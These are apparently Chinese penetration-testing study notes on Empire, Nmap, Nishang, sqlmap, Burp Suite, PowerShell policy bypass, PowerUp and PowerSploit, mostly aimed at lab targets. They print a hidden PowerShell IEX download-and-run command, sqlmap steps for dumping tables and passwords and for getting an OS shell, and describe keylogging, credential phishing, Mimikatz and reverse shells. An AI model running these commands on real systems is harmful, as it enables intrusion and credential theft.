Empire简介

Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具，具有从stager生成、提权到渗透维持的一系列功能

基本使用会涉及以下内容

1.帮助文档

2.设置监听

3.生成木马

4.连接主机和基本使用

5.信息收集

6.权限提升

设置监听步骤如下：

listeners #进入监听线程界面

uselistener #设置监听模式

info #查看具体参数设置

set #设置相应参数

execute #开始监听

连接主机和基本使用

在目标主机反弹成功以后，可以通过agents命令列出当前已连接的主机，这里要注意如果有带有(*)的是已提权成功的主机。

然后使用interact命令连接主机，可以使用Tab键补全主机的名称，连接成功以后可以通过rename修改会话名称

信息收集

Empire主要用于后渗透。所以信息收集是比较常用的一个模块，可以使用searchmodule命令搜索需要使用的模块，这里通过键如usemodule collection然后按Tab查看完整的列表

常用模块：

屏幕截图 ​输入以下命令，然后执行即可

键盘记录

输入以下命令usemodule collection/keylogger，通过info可以查看详细信息，execute执行

权限提升

提权，顾名思义就是提高自己在服务器中的权限，就比如在Windows中，你本身登陆的用户是Guest，通过提权后，就会变成超级管理员，拥有了管理Windows的所有权限。以下是常见几种提权方式：

1.Bypass UAC

UAC介绍

UAC（UserAccount Control，用户账户控制）简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。

横向渗透

就是在已经攻占部分内网主机的前提下，利用既有的资源尝试获取更多的凭据、更高的权限，进而达到控制整个内网、拥有最高权限、发动类似 APT 的目的。

在横向渗透中，最先得到的主机，以及之后新得到的主机，会成为突破口、跳板。如同一个不断扩大的圆形，获得的主机越多，圆能触及之处越大，让其周遭的「横向」部分由未知成为已知

Nmap的基本

Nmap + ip 6+ ip

Nmap -A 开启操作系统识别和版本识别功能

– T（0-6档）  设置扫描的速度  一般设置T4    过快容易被发现

-v 显示信息的级别，-vv显示更详细的信息

192.168.1.1/24 扫描C段   192.168.11 -254 =上

nmap -A -T4 -v -iL   ~/targets.txt   (iL表示要扫描的目标位于一个文档中)

       --------------- 192.168.1.1/24  --exclude 192.168.1.100  （排除在外的目标 .100）

       --------------- -----------------excludefile  ~/targets.txt

       nmap 192.168.1.1   -p 80.443 网站  是否在这个端口部署网站

       nmap –traceroute 192.168.1.1   探测路由

       nmap -O 192.168.1.1                 对目标进行指纹识别

       nmap -sV    ----------          对版本进行探测

       nmap -sF -T4 192.168.1.1           利用fin包对端口进行扫描，识别是否被关闭，收到RST包，说明被关闭。否则是open 后者 fileter状态。  （利用三次握手，可以绕开防火墙）

       nmap –script=auth+ip 处理鉴权证书的脚本，也可以作为检测部分应用弱口令

       -----------=brute+ip 暴力破解

       扫描脚本介绍:

位置 : nmap安装目录/scripts/     例如/usr/share/nmap/scripts

脚本类型：

ll  /usr/share/nmap/scripts | grep ^- | wc -l

使用介绍:

nmap --script=auth 192.168.137.*

负责处理鉴权证书（绕开鉴权）的脚本,也可以作为检测部分应用弱口令

nmap --script=brute 192.168.137.*

提供暴力破解的方式  可对数据库，smb，snmp等进行简单密码的暴力猜解

nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*

默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击。

nmap --script=vuln 192.168.137.* 

检查是否存在常见漏洞

nmap -n -p445 --script=broadcast 192.168.137.4

在局域网内探查更多服务开启状况

zenmap

Nmap 的图形化界面：

Nishang简介

Nishang是一款基于PowerShell的渗透测试专用工具，集成了框架、脚本和各种Payload，包括下载和执行、键盘记录、DNS、延时命令等脚本，被广泛应用于渗透测试的各个阶段。

下载地址为：https://github.com/samratashok/nishang

模块攻击实战：

1.Check-VM

它是用于检测当前的机器是否是一台已知的虚拟机的。它通过检测已知的一些虚拟机的指纹信息（如：Hyper-V, VMWare, Virtual PC, Virtual Box,Xen,QEMU）来识别,如下可看到是一台虚拟机

2. Invoke-CredentialsPhish

这个脚本用来欺骗用户，让用户输入密码，在不输入正确密码关闭不了对话框，只能强子结束进程

3. Get-PassHashes

在Administrator的权限下，可以dump出密码哈希值。这个脚本来自于msf中powerdump，但做出了修改，使得我们不再需要System权限就可以dump了

4. Invoke-Mimikatz

需要管理员权限，抓取密码

5. Show-TargetScreen

使用MJPEG传输目标机器的远程桌面的实时画面，在本机我们可以使用NC或者Powercat来进行监听。在本地使用支持MJPEG的浏览器（如：Firefox）访问本机对应监听端口，即可在浏览器上面看到远端传输回来的实时画面。

6. Get-PassHints

获取用户的密码提示信息，需要有Administrator权限来读取sam hive

PowerShell交互式Shell

Nishang可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型Shell

使用时例：

1. 正向连接

1.1在目标机运行脚本，监听端口88

1.2使用nc连接到目标机端口88

2.反向连接

2.1使用nc监听本地端口88（注意必须先监听，不然在目标机上执行脚本会出错）

2.2在目标机上运行脚本来反弹shell

2.3观察攻击机，可以发现成功反弹shell

基于HTTP和HTTPS协议的PowerShell交互式Shell

（需要攻击者以管理员的身份）

1. 首先我们需要在攻击机上使用脚本，需要的信息有攻击机IP，要监听的端口。运行完脚本，就等着目标机反弹Shell了。

2. 在目标机上运行下列命令，反弹Shell

3. 观察攻击机，可以发现成功反弹shell

权限提升：

是指利用操作系统或软件应用程序中的漏洞、设计缺陷或配置疏忽，让应用或用户获得对受保护资源的高级访问权限。这里主要通过Bypass UAC来提权

需要UAC的授权才能进行的操作

1.配置Windows Update

2.增加、删除账户

3.更改账户类型

4.更改UAC的设置

5.安装ActiveX

6.安装、卸载程序

7.安装设备驱动程序

8.将文件移动/复制到Program Files或Windows目录下

9.查看其它用户的文件夹

SQLmap 简介

是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。

支持的数据库：MySQL，Oracle, PostgreSQL, SQL Server,  Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

1.安装sqlmap前，需要先安装Python3.X

Python Releases for Windows | Python.org

1.1在环境变量path中，增加python3.x 安装路径

2.下载sqlmap并解压缩：

地址：sqlmap: automatic SQL injection and database takeover tool

Python sqlmap.py -u http://xxx.xxx.xxx/

Python sqlmap.py –help 查看帮助 borp

 sqlmap支持五种不同的注入模式：

• UNION query SQL injection（可联合查询注入）
• uError-based SQL injection（报错型注入）
• uBoolean-based blind SQL injection（布尔型注入）
• uTime-based blind SQL injection（基于时间延迟注入）
• uStacked queries SQL injection（可多语句查询注入）

2.sqlmap 常用命令参数

-u  /--url  最基本格式 sqlmap -u “XXXXXXXXXXXXX/index.pho?id=1”

-m 从文本中获取多个目标扫描，但是每一个一个url. sqlmap -m urllist.txt

-r 从文件中加载HTTP请求，这样的话就不需要再去设定cookie，POST数据….

--dbs 返回当前连接的数据库

--current-db 返回当前网站数据库的数据库用户

-D 指定数据库系统的数据库名

--tables 列举数据库表

-T 指定数据库表名

--columns 列举数据库表中的字段

-C 指定数据库表中的字段名

--dump 获取整个表的数据

3.设置回显等级

参数： -v默认为1

3.1 只显示python错误以及严重的信息

3.2  基本信息和警告信息

3.3  debug信息

3.4  注入的payload

（级别越高显示信息越多）

4.  同时显示HTTP请求。

5 同时显示HTTP响应头。

6 同事显示HTTP响应页面。

--data 把数以post方式提交，sqlmap会像检测GET参数一样检测POST过去的参数。

--cookie （用于区分用户）

可能会有漏洞，当web登录时，抓取数据包。

 4设置HTTP数据包相关参数

HTTP User-Agent 头

参数：--random-agent 会从sqlmap/txt/user-agents.txt中随机产生User-Agent头。

sqlmap -u “http://www.target.com” --level 3 --andom-agent --dbs

sqlmap 检查uesr-agent中的注入点, level>=3才会去检查user-agent头是否存在注入漏洞

5.设定探测等级：--level

共有五个等级 默认为1 sqlmap使用的payload可以在xml/payloads.xml中看到

--users 列数据库管理用户

--current-user 在数据库中，目前连接的用户

--is-dba 判断当前是否为管理，是的话返回true

--proxy 指定一个代理服务器  eg: -proxy http://xxxxxx.8080

--os-shell 前提：需要网站的物理路径，其次是需要有FIILE权限

 6.Sqlmap“六步”

第一步：判断是否注是注入点

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)”

检测该网站是否存在漏洞   白色加粗字体为注入点 也就是攻击对象

第二步：获取数据库

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” –dbs

第三步：查看当前应用程序所用数据库

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)”  --current-db

四：列出指定数据库的所有表

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security（目标数据库）”—tables

五：读取指定表中的字段名称

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security”-T users –colunms

六：读取指定字段内容

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security”-T users -C username,password –dump（dump=下载，脱库）

判断当前数据库用户权限：

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” --is-dba

如果是TRUE  ，那么权限该用户很大。

-roles 列出数据库管理员角色

 如果当前用户有权限读取包含所有用户的表，输入该命令会列举出每个用户的角色，

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --roles

-referer HTTPReferer头

当–level参数设定为3或3以上时，会尝试对HTTP Referer注入。可以使用referer命令来欺骗，如--referer https://mp.mysite.net

-sql-shell 运行自定义的sql语句

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --sql-shell

运行任意操作系统命令：

选择后台语言

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami

--os-cmd=whoami

--os-shell

(以你的电脑为跳板，对局域网进行渗透，或留后门)

--file-read 从数据库服务器中读取文件  ：当前用户有权限使用特定的函数时，读取的文件可以是文本，也可以是二进制文件。

上传文件到数据库服务器中：

--file-write

--file-dest

读取指定数据库用户的密码 

sqlmap -u "http://xxxxx/fuzz/index.php?id=1" --passwords -U root

SQLMAP进阶 常用tamper脚本

  apostrophemask.py 将引号替换为utf-8，用于过滤单引号 （易容术）

适用数据库：ALL

作用：将引号替换为utf-8，用于过滤单引号

使用脚本前：tamper("1 AND '1'='1")

使用脚本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

  multiplespaces.py  围绕sql关键字添加多个空格 去绕过

适用数据库：ALL

作用：围绕sql关键字添加多个空格

使用脚本前：tamper('1 UNION SELECT foobar')

使用脚本后：1 UNION SELECT foobar

Burp Suite工具

一．配置及代理设置

1.使用前配置

①选择代理Proxy选项卡

②选择设置option选项卡

③Edit Running打勾  124.0.0.1:8080

配置成功

历史访问

二．功能模块讲解

模块介绍

send to spider 发送给爬虫模块

do a active scan 进行一次主动扫描

send to intruder 发送给爆破模块

send to repearter 发送给重放模块

send to comparer 发送给比对模块

send to decoder 发送给解码模块

request in browser 将请求在浏览器重放

 四：MYSQL与SQL注入

mysql知识点- 基本查询语句

1. 查询表中全部信息： select *from 表明-关键的函数

select+以下语句

       version() 数据库版本

       database() 数据库名

       user() 用户名

       current_user() 当前用户名

       system_user() 系统用户名

       @@datadir 数据库路径

       @@version_compile_os 操作系统版本

-order by（排序） 语法

-联合查询

order by 1—

order by 2—确定字段数

   使用UNION操作符注入另外一个select查询，并将查询结果附加在第一次查询结果之后。第二次查询能够从另外一个完全不同的数据库表中提取数据

  注意： 相同的列结构

               需要有知道表结构，列结构

       exists（）函数猜解表明

       information_schema 是一个mysql系统自带的元数据库

information_schema.SCHEMATA 查看所有的数据库

Meteasploit技术

   在使用Kali操作系统是应注意即使更新源，就像平时及时更新手机APP更新命令如下：

1. apt-get update:只更新软件包的索引源，作用：同步源的软件包的索引信息，从而进行软件更新。
2. Apt-get upgrade:升级系统上安装的所有软件包，如果失败则保持更新之前的状态。

Apt-get dist-upgrade:升级整个Liunux系统（不仅升级所有已安装的软件包，而且会处理升级过程中可能出现的冲突，在某些情况下，他的部分升级需要人工参与）。

渗透攻击大致步骤：

*扫描目标及系统，寻找可用漏洞。

*选择并配置一个漏洞利用模块。

*选择并配置一个攻击利用模块。

*选择一个编码技术，用来绕过杀毒软件的查杀。

*渗透攻击。

Powershell

是一种基于任务的命令行解释器和脚本环境，可以说是一种强大的shell,如同linux的bash,专为系统管理员而设计，以.NET框架为平台，Windows PowerShell帮助IT专业人员和超级用户控制和自动化管理Windows操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面，在不需要写入磁盘的情况下执行命令，也可以逃避Anti-Virus检测。另外，可以把PowerShell看作命令行提示符cmd.exe的扩充。

 对于渗透，使用PowerShell场景：

第一种我们需要获得免杀或者更好的隐蔽攻击对方的win机器，可以通过钓鱼等方式直接执行命令

第二种我们已经到了对方网络，或是一台DMZ的win机器，那么我们利用PowerShell对内网继续深入

基于.NET框架

操作系统信任

提供win系列操作系统的几乎一切访问权限

win7之后默认安装

脚本可以运行在内存中，不需要写入磁盘

cmd.exe通常会被安全软件阻止，一般PowerShell不会

常用攻击工具：

可以输入Get-Host或者$PSVersionTable.PSVERSION命令查看当前系统的PowerShell版本。

一个PowerShell脚本其实就是一个简单的 文本文件，这个文件包含了一系列的 PowerShell命令，每个命令显示为独立的一行，PowerShell文件的后缀为 .PS1。

执行策略：

为防止恶意脚本的执行，PowerShell有一个执行策略，默认情况下，这个执行策略被设置为受限。

我们可以使用： Get-ExecutionPolicy  命令查看PowerShell当前的执行策略。它有4个策略。

Restricted：脚本不能运行(默认设置)

RemoteSigned：本地创建的脚本可以运行，但是从网上下载的脚本不能运行(拥有数字证书签名的除外)

AllSigned：仅当脚本由受信任的发布者签名时才能运行；

Unrestricted：允许所有的脚本执行

另外修改PowerShell执行策略：Set-ExecutionPolicy 策略名 #该命令需要管理员权限运行

运行脚本：

运行一个脚本，必须键入完整的路径和文件名，例如，你要运行一个名为a.ps1的脚本，可以键入c:\script\a.ps1

但如果PowerShell脚本文件在你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如.\a.ps1的前面就加上“.\”，这和在Linux下执行Shell脚本的方法一样。

管道：

管道的作用就是将一个命令的输出作为另一个命令的输入，两个命令之间用管道符号(|)连接

例如：

假设停止所有目前运行中的，以“note"字符开头命名的程序

Get-Process note*|stop-process

基本知识：

在PowerShell下，类似“cmd命令”叫做“cmdlet” ，其命令的命名规范很一致，都采用了 动词-名词的形式，如Net-Item，动词一般为Add、New、Get、Remove、Set等。PowerShell还兼容cmd和Linux命令，如查看目录可以使用 dir 或者 ls ，并且PowerShell命令不区分大小写。

后面会以文件操作为例讲解PowerShell命令的基本用法

如果运行PowerShell脚本程序，必须用管理员权限将Restricted策略改成Unrestricted

在渗透测试时，就需要采用一些方法绕过策略来执行PowerShell脚本，列举如下三种方式

1.绕过本地权限执行

2.本地隐藏绕过权限执行脚本

3.用IEX下载远程PS1脚本绕过权限执行

如果运行PowerShell脚本程序，必须用管理员权限将Restricted策略改成Unrestricted

在渗透测试时，就需要采用一些方法绕过策略来执行PowerShell脚本，列举如下三种方式

1.绕过本地权限执行

2.本地隐藏绕过权限执行脚本

3.用IEX下载远程PS1脚本绕过权限执行

上传test.ps1到目标主机，在cmd环境下，在目标主机本地当前目录执行该脚本

powershell -exec bypass  .\test.ps1

powershell.exe -exec bypass -W hidden -nop  test.ps1

输入命令执行后会退出命令提示符

powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

对上述命令参数进行说明

ExecvtionPolicy Bypass（-exec bypass）：绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PoweShell不允许运行命令和文件。通过设置这个参数，可以绕过任意一个安全保护规则;

WindowStyle Hidden(-w hidden)：隐藏窗口，也就是执行完命令后，窗口隐藏;

-command(-c)：执行powershell脚本;

NoProfile(-nop)：PowerShell控制台不加载当前用户的配置文件；

NoLogo：启动不显示版权标志的PowerShell；

Nonlnteractive(-noni)：非交互模式；

Noexit：执行后不退出shell，这在使用键盘记录等脚本时非常重要；

-enc  base64： 把ps脚本编码成base64来执行，实战用的最多；

PowerUP攻击模块

Powerup是Privesc模块下的一个脚本

拥有众多实用的脚本来帮助我们寻找目标主机Windows服务漏洞进行提权。

模块介绍：

1.invoke-allchecks：执行所有的脚本来检查

2.find-pathdllhijack：检查当前%path是否存在哪些目录是当前用户可以写入的

3.Get-ApplicationHost：从系统上的applicationHost.config文件恢复加密过的应用池和虚拟目录的密码

4.Get-RegistryAlwaysInstallElevated：检查AlwaysInstallElevated注册表项是否被设置，如果被设置，意味着的MSI文件是以system权限运行的。

5.Get-RegistryAutoLogon：检测Winlogin注册表AutoAdminLogon项有没有被设置，可查询默认的用户名和密码。

6.Get-ServiceDetail：返回某服务的信息。

7. Get-ServiceFilePermission：检查当前用户能够在哪些服务的目录写入相关联的可执行文件，通过这些文件可达到提权的目的。

8. . Test-ServiceDaclPermission

检查所有可用的服务，并尝试对这些打开的服务进行修改，如果可修改，则返回该服务对象。

9. . Get-ServiceUnquoted：检查服务路径，返回包含空格但是不带引号的服务路径。

10. Get-UnattendedInstallFile：检查几个路径，查找是否存在这些文件，在这些文件里可能包含有部署凭据

11.Get-ModifiableRegistryAutoRun：检查开机自启的应用程序路径和注册表键值，返回当前用户可修改的程序路径。

注册表检查的键值为：

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunService

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceService

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunService

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceService

12. Get-ModifiableScheduledTaskFile：返回当前用户能够修改的计划任务程序的名称和路径。

13. Get-Webconfig：返回当前服务器上的web.config文件中的数据库连接字符串的明文。

14.Invoke-ServiceAbuse：用来通过修改服务添加用户到指定组，并可以通过定制-cmd参数触发添加用户的自定义命令

15.Restore-ServiceBinary：恢复服务的可执行文件到原始目录。

16. Test-ServiceDaclPermission：检查某个用户是否在一个服务有自由访问控制的权限，返回true或false。

17. Write-HijackDll：输出一个自定义命令并且能够自删除的bat文件到$env:Tempdebug.bat，并输出一个能够启动这个bat文件的dll。

18.Write-UserAddMSI：生成一个安装文件，运行这个安装文件，则弹出添加用户的框。

19. Write-ServiceBinary：预编译C#服务的可执行文件。默认创建一个默认管理员账号。可通过Command定制自己的命令。

20. Install-ServiceBinary：通过Write-ServiceBinary写一个C#的服务用来添加用户。

PowerSploit的介绍

以kali服务器为例，介绍两种方式

第一种：

开启apache服务：service apache2 start

将powersploit目录放到/var/www/html/中

第二种：

切换到powersploit目录，然后执行如下命令开启WEB服务器

python3 -m http.server 8080

Git clone https://github.com/PowerShellMafia/PowerSploit

Invoke-Shellcode脚本

直接执行shellcode反弹meterpreter shell

首先在MSF里使用reverse_https模块进行监听

然后使用msfvenom命令生成一个PowerShell脚本木马

接着在目标机Powershell下输入以下命令下载该脚本

接着输入以下命令下载木马

接着在PowerShell下运行该命令

（Force意思是不用提示，直接执行。返回MSF的监听界面下，发现已经反弹成功了）

Mimikatz本身在内网渗透中作用很大，PowerSploit将其集成到Exfiltration模块下，Mimikatz用来抓取主机密码，

（注意的是这个脚本的运行需要管理员权限。）